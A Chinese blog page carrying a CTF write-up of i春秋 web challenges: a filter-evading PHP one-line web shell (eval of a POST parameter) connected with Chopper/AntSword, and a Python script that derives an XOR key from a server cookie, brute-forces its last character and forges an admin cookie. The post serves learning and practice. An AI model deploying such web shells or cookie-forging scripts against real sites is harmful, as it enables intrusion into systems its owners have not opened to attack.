<!DOCTYPE HTML>
<html class="no-js" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.8.0">
    <!--[if lte IE 9]>
<meta http-equiv="refresh" content="0;url=http://yoursite.com/warn.html">
<![endif]-->
<meta charset="utf-8">
<meta http-equiv="X-DNS-Prefetch-Control" content="on">
<link rel="dns-prefetch" href="http://yoursite.com">
<link rel="dns-prefetch" href="//www.google-analytics.com">
<link rel="prefetch" href="http://yoursite.com">
<link rel="prefetch" href="//www.google-analytics.com">


<link rel="prerender" href="http://yoursite.com">

<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="renderer" content="webkit">
<meta name="viewport" content="width=device-width, initial-scale=1.0,user-scalable=no">
<meta http-equiv="mobile-agent" content="format=html5; url=http://yoursite.com">
<meta name="author" content="John Doe">
<link rel="stylesheet" href="/css/JSimple.css">

<link rel="shortcut icon" href="/images/favicon.png">


<title>i春秋二 web code - Hexo</title>

<meta name="keywords" content>

<meta name="description " content>

    <script type="text/x-mathjax-config">
        MathJax.Hub.Config({
            tex2jax: {
                inlineMath: [ ['$','$'], ["\\(","\\)"] ],
                processEscapes: true
            }
        });
    </script>


    

    

</head>
<body>
<div id="nav">
    <nav class="nav-menu">
        <a class="site-name current" href="/" title="说">说</a>
        <a class="site-index current" href="/"><i class="fa fa-home"></i><span>Home</span></a>
        <a href="/archives" title="Archives"><i class="fa fa-archives"></i><span>Archives</span></a>
        <a href="/tags" title="Tags"><i class="fa fa-tags"></i><span>Tags</span></a>
        <!-- custom single page of menus -->
        
        
        <a href="/help" title="帮助">
            <i class="fa fa-question-circle"></i>
            <span>帮助</span>
        </a>
        
    </nav>
</div>

<div class="nav-user">
    <a class="btn-search" href="#"><i class="fa fa-search"></i></a>
    <a class="btn-read-mode" href="#"><i class="fa fa-sun-o"></i></a>
    <a class="btn-sns-qr" href="javascript:"><i class="fa fa-telegram"></i></a>
</div>

<div id="wrapper" class="clearfix">
    <div id="body">
        <div class="main" id="main">
            <div id="cover">
    <div class="cover-img"></div>
    <div class="cover-info">
        
        <h1 class="cover-siteName">说IT</h1>
        <h3 class="cover-siteTitle">用代码摇滚这个世界</h3>
        <p class="cover-siteDesc">一个关注技术与人文的IT博客</p>
        <div class="cover-sns">
            
    &nbsp;&nbsp;<div class="btn btn-telegram">
        <a href="http://t.me/kunyintang" target="_blank" title="telegram" ref="friend">
            <i class="fa fa-telegram"></i>
        </a>
    </div>

    &nbsp;&nbsp;<div class="btn btn-instagram">
        <a href="https://www.instagram.com/mtangsir/" target="_blank" title="instagram" ref="friend">
            <i class="fa fa-instagram"></i>
        </a>
    </div>

    &nbsp;&nbsp;<div class="btn btn-twitter">
        <a href="https://twitter.com/tangkunyin" target="_blank" title="twitter" ref="friend">
            <i class="fa fa-twitter"></i>
        </a>
    </div>

    &nbsp;&nbsp;<div class="btn btn-github">
        <a href="https://github.com/tangkunyin" target="_blank" title="github" ref="friend">
            <i class="fa fa-github"></i>
        </a>
    </div>


        </div>
    </div>
</div>

            <div class="page-title">
    <ul>
        <li><a href="/">Recent Posts</a></li>
        
        
        
        <li class="page-search">
    <form id="search" class="search-form">
        <input type="text" readonly="readonly" id="local-search-input-tip" placeholder="click to search...">
        <button type="button" disabled="disabled" class="search-form-submit"><i class="fa fa-search"></i></button>
    </form>
</li>

    </ul>
</div>
<div class="main-inner">
    <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
        <div class="post-header">
            <div class="post-author clearfix">
                <a class="avatar fleft" href="https://shuoit.net" target="_blank">
                    <img width="48" src="/images/favicon.png" alt="avatar">
                </a>
                <p><span class="label">Author</span>
                    <a href="https://shuoit.net" target="_blank">纠结伦</a>
                    <span title="Last edited at&nbsp;2019-03-29">2019-03-29</span>
                </p>
                <p>一个搬🧱的劳斯基😁️️</p>
            </div>
            <h2 class="post-title">i春秋二 web code</h2>
            <div class="post-meta">
                emm... 3683 words in the article |
                you are the&nbsp;<span id="busuanzi_value_page_pv"><i class="fa fa-spinner fa-spin"></i></span>th friend who reading now
            </div>
        </div>
        <div class="post-content markdown-body">
            <h1 id="upload"><a href="#upload" class="headerlink" title="upload"></a>upload</h1><p>写那个之前，先把一个折磨了我半天的要死的一道题写了，这道题就是一句话木马+菜刀，因为把php过滤了，所以用防过滤的一句话木马，<script language="PHP"><br> @eval($_POST[“code”]);</script>，然后连接菜刀。</p>
<h3 id="注意："><a href="#注意：" class="headerlink" title="注意："></a>注意：</h3><p> 1.文件名字为数字或字母，不能为汉字，否则不能提交成功。<br> 2.菜刀中的url必须到PHP文件。<br> 3.密码为$_POST内部的值。<br> 然后就可以连接蚁剑或者菜刀，我明明按照这样做的，最后双击的时候，会出现文件管理器，结果我试了无数次失败，换蚁剑和菜刀，失败，换密码，失败。。。。<br> 后来问大佬，大佬说这题没事，我又做了一遍，最后终于成功出来结果，真是要死。。<br> 最后结果：<br> <img src="/2019/03/29/i春秋二/i春秋二-e2e066bd.PNG" alt><br>牢骚撒完，接下来步入正轨：<br>这个题做了半天，没有做出来，最后看了wp，也看了半天，我会尽可能详细的把思路写清。。。。<br>打开页面，先看源代码，看到了base64加密的密文，兴奋了半天，后来解密，解了半天，失败。。结果如下：<br><img src="/2019/03/29/i春秋二/i春秋二-f5c9ca69.PNG" alt><br>后来仔细观察，想着尝试一些经常见到的index.php,结果base64解码，呀！<img src="/2019/03/29/i春秋二/i春秋二-c5be712d.PNG" alt><br>大眼瞪小眼瞪了半天，放弃，找大佬，果然脑洞！！<br>Created by PhpStorm。。。。。<br>phpstorm是php代码的集成开发环境，下载phpstorm，并新建一个项目，会发现在项目文件夹里面会生成一个.idea文件，它存储了项目的配置文件，<br>打开.idea文件可以发现misc.xml,modules.xml,workspace.xml文件。<br>然后访问以下网址：<br><a href="http://71c30ca31f0d4b939d71790f14560c0975dd308441904b4b.changame.ichunqiu.com/.idea/workspace.xml" target="_blank" rel="noopener">http://71c30ca31f0d4b939d71790f14560c0975dd308441904b4b.changame.ichunqiu.com/.idea/workspace.xml</a><br>结果发现：<br><img src="/2019/03/29/i春秋二/i春秋二-59f502ba.PNG" alt><br>一个个的试。。。。。。<br><a href="http://71c30ca31f0d4b939d71790f14560c0975dd308441904b4b.changame.ichunqiu.com/x.php" target="_blank" rel="noopener">http://71c30ca31f0d4b939d71790f14560c0975dd308441904b4b.changame.ichunqiu.com/x.php</a><br>Not Found<br><a href="http://71c30ca31f0d4b939d71790f14560c0975dd308441904b4b.changame.ichunqiu.com/config.php" target="_blank" rel="noopener">http://71c30ca31f0d4b939d71790f14560c0975dd308441904b4b.changame.ichunqiu.com/config.php</a><br>空白。。。。<br><a href="http://71c30ca31f0d4b939d71790f14560c0975dd308441904b4b.changame.ichunqiu.com/fl3g_ichuqiu.php" target="_blank" rel="noopener">http://71c30ca31f0d4b939d71790f14560c0975dd308441904b4b.changame.ichunqiu.com/fl3g_ichuqiu.php</a><br>╮(╯▽╰)╭ 这是在搞笑吗？<br>在我一筹莫展之时，脑洞再次降临。。。。。。<br>仔细观察上一段代码，发现用config替换_，于是访问：<br><a href="http://71c30ca31f0d4b939d71790f14560c0975dd308441904b4b.changame.ichunqiu.com/?jpg=fl3gconfigichuqiu.php" target="_blank" rel="noopener">http://71c30ca31f0d4b939d71790f14560c0975dd308441904b4b.changame.ichunqiu.com/?jpg=fl3gconfigichuqiu.php</a><br>查看源码，base64解码：<br>有点大，一部分一部分慢慢解释。。。<br><img src="/2019/03/29/i春秋二/i春秋二-3d9028aa.PNG" alt><br>获取length位数的随机字符串</p>
<p><img src="/2019/03/29/i春秋二/i春秋二-7f8764a1.PNG" alt><br>加密过程，txt是明文，key是秘钥。先将txt内容的ascii码加10，再取4位随机字符，并与秘钥进行拼接得到新的秘钥。将明文与key按位进行异或，key的长度最长为32，最后将随机字符与异或后的结果进行字符串拼接，然后进行base64加密，得到密文。</p>
<p><img src="/2019/03/29/i春秋二/i春秋二-5bcb8c56.PNG" alt><br>解密过程，txt是密文，key是秘钥。将密文进行base64解码，取出解码后的密文的前四位作为随机数字符串，从第5位开始的内容为真正的密文，并将随机字符串与秘钥进行拼接得到新的秘钥。将密文与秘钥进行异或得到tmp，将tmp的ascii码减10得到明文。</p>
<p><img src="/2019/03/29/i春秋二/i春秋二-c6090fbf.PNG" alt><br>将HTTP Cookie方式传递的user变量作为密文，与秘钥进行解密。<br>如果解密出的结果为system，则显示flag；如果解密出的结果不是system，则向客户端发送一个http cookie，cookie名称为user变量，cookie的值为guest与秘钥加密的结果，并显示一个表情。<br>获取flag的思路：要获取flag就要获取key，使得key与$_COOKIE[‘user’]的解密结果为system。</p>
<p>大佬的思路：<br>//获取key的思路：通过浏览器向服务器请求“抱歉”表情界面的url，服务器就会向浏览器返回一个固定的cookie值，</p>
<p>//即：encrypt(‘guest’,$key)，则cookie值就是明文“guest”与key(5位)加密的结果(即guest与key异或得到cookie，那么guest与cookie异或可以得到key)。</p>
<p>//得到5位的key后，可以爆破第六位的key，只要用得到的5位key连接上构造的第六位key,与“system”进行加密得到的user变量的cookie值去请求相应的url，</p>
<p>//通过服务器反馈的内容含有“flag”关键字符，则说明构造的第六位key值正确，从而可以得到六位的key以及flag的内容。</p>
<p>脚本如下：</p>
<h1 id="coding-cp936"><a href="#coding-cp936" class="headerlink" title="-- coding: cp936 --"></a>-<em>- coding: cp936 -</em>-</h1><p>import requests</p>
<p>import string</p>
<p>from base64 import *</p>
<p>#返回“抱歉”表情的url</p>
<p>url=”<a href="http://71c30ca31f0d4b939d71790f14560c0975dd308441904b4b.changame.ichunqiu.com/fl3g_ichuqiu.php&quot;" target="_blank" rel="noopener">http://71c30ca31f0d4b939d71790f14560c0975dd308441904b4b.changame.ichunqiu.com/fl3g_ichuqiu.php&quot;</a></p>
<p>#请求该url，获取服务器返回的user变量的cookie值,即encrypt(‘guest’,$key)</p>
<p>cookie=requests.get(url).cookies[‘user’]</p>
<p>#将密文cookie进行base64解码</p>
<p>txt=b64decode(cookie)</p>
<p>rnd=txt[:4] #密文的前4位字符为随机字符</p>
<p>ttmp=txt[4:]#ttmp为’guest’与key进行异或的密文值,ttmp与’guest’的位数一样，为5位</p>
<p>keys=list(‘xxxxxx’) #六位key的初始字符串</p>
<p>guest=list(‘guest’)#guest明文内容</p>
<p>system=list(‘system’)</p>
<p>for i in range(len(guest)):</p>
<pre><code>guest[i]=chr(ord(guest[i])+10)#guest明文的ascii码加10，为guest加密做准备(encrypt(&apos;guest&apos;,$key))
</code></pre><p>for i in range(len(guest)):</p>
<pre><code>keys[i]=chr(ord(ttmp[i])^ord(guest[i]))#ttmp为&apos;guest&apos;与key进行异或的密文值,则ttmp与guest异或为keys
</code></pre><p>for i in range(len(system)):</p>
<pre><code>system[i]=chr(ord(system[i])+10)#system的ascii码加10，为system加密做准备
</code></pre><p>letters=’ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz’#第六位key的爆破字符</p>
<p>ttmp_new=’’ #system与keys的异或值</p>
<p>cookie_system=[]</p>
<p>str=’’</p>
<p>for ch in letters:</p>
<pre><code>keys[5]=ch

for i in range(len(system)):

    ttmp_new +=chr(ord(system[i])^ord(keys[i]))

str=rnd+ttmp_new #随机字符与异或结果进行拼接

cookie_system.append(b64encode(str)) #将拼接结果进行base64加密，得到flag界面的cookie值，并将其填充到字典cookie_system中

ttmp_new=&apos;&apos;#爆破一次，就将ttmp_new初始化一次
</code></pre><p>##print cookie_system #输出所有可能的key爆破得到的cookie值</p>
<p>for i in cookie_system:</p>
<pre><code>cookies={&apos;user&apos;:i} #cookie变量为user,值为i

res=requests.get(url,cookies=cookies) #用所有的cookie值去尝试访问服务器，得到的反馈为res

if &apos;flag&apos; in res.content:#如果反馈的内容含有‘flag’关键字，则说明请求的cookie正确，即keys爆破成功

    #print  cookie_system[i] #输出正确的cookie值

    print(res.content) #输出服务器反馈的内容，即flag
</code></pre><p>##大佬链接：<a href="https://www.ichunqiu.com/writeup/detail/4139" target="_blank" rel="noopener">https://www.ichunqiu.com/writeup/detail/4139</a></p>

        </div>
        <div class="post-tool">
            <a class="btn-thumbs-up" href="javascript:void(0);" data-cid="52" title="95">
                <i class="fa fa-thumbs-up" aria-hidden="true"></i> Donate
            </a>
        </div>
        
        <div class="post-tags">Tags：
            
            <a href="/tags/ctf/">ctf</a>
            
        </div>
        
    </article>
    
    <p style="text-align: center">This article just represents my own viewpoint. If there is something wrong, please correct me.</p>
    
    

    

</div>
<script src="/js/busuanzi.pure.mini.js"></script>


        </div><!-- end #main-->
    </div><!-- end #body -->
    <footer class="footer">
    <div class="footer-inner" style="text-align: center">
        <p>
            <a href="/about" title="About">About</a>&nbsp;&nbsp<em>·</em>&nbsp;&nbsp
            <!-- 自定义链接 -->
            <a href="/help" title="Help">Help</a>&nbsp;&nbsp<em>·</em>&nbsp;&nbsp
            <a href="/links" title="Links">Links</a>&nbsp;&nbsp<em>·</em>&nbsp;&nbsp
            <a href="/sitemap.xml" title="SiteMap">SiteMap</a>
        </p>
        <p>
            Has been established&nbsp<a href="/timeline" id="siteBuildingTime"></a>&nbspDays，<a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="licence">Based on Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0)</a><br>
            ©2017-<span id="cpYear"></span> Based on&nbsp<a href="http://hexo.io" target="_blank" rel="nofollow">Hexo</a>
            ，Theme by&nbsp&nbsp<a href="https://github.com/tangkunyin/hexo-theme-jsimple" target="_blank" rel="bookmark">JSimple</a>
            ，Author&nbsp<a href="https://shuoit.net" target="_blank" rel="friend">纠结伦</a>
            ，Hosted by <a href="https://pages.github.com/" target="_blank" rel="nofollow">GitHub Pages</a>
        </p>
    </div>
</footer>
<script src="/js/SimpleCore.js"></script>

</div>
<!-- search pop -->
<div class="popup search-popup local-search-popup">
    <div class="local-search-header clearfix">
        <span class="search-icon">
            <i class="fa fa-search"></i>
        </span>
        <span class="popup-btn-close">
            <i class="fa fa-times-circle"></i>
        </span>
        <div class="local-search-input-wrapper">
            <input id="local-search-input" spellcheck="false" type="text" autocomplete="off" placeholder="Input query keywords here...">
        </div>
    </div>
    <div id="local-search-result"></div>
</div>
<div class="fixed-btn">
    <a class="btn-gotop" href="javascript:"> <i class="fa fa-angle-up"></i></a>
</div>
<script>
    $(function () {
        var jsi_config = {
            buildingTime: '01/20/2018',
            current: $('.post-tags').length > 0 ? 'post' : 'archive',
            snsQRCode: '/images/sns-qrcode.png',
            donateImg: '/images/donate-qr.png',
            localSearch: { dbPath: '' },
            readMode: 'day'
        };
        
        SimpleCore.init(jsi_config);
        
    });
</script>
</body>
</html>
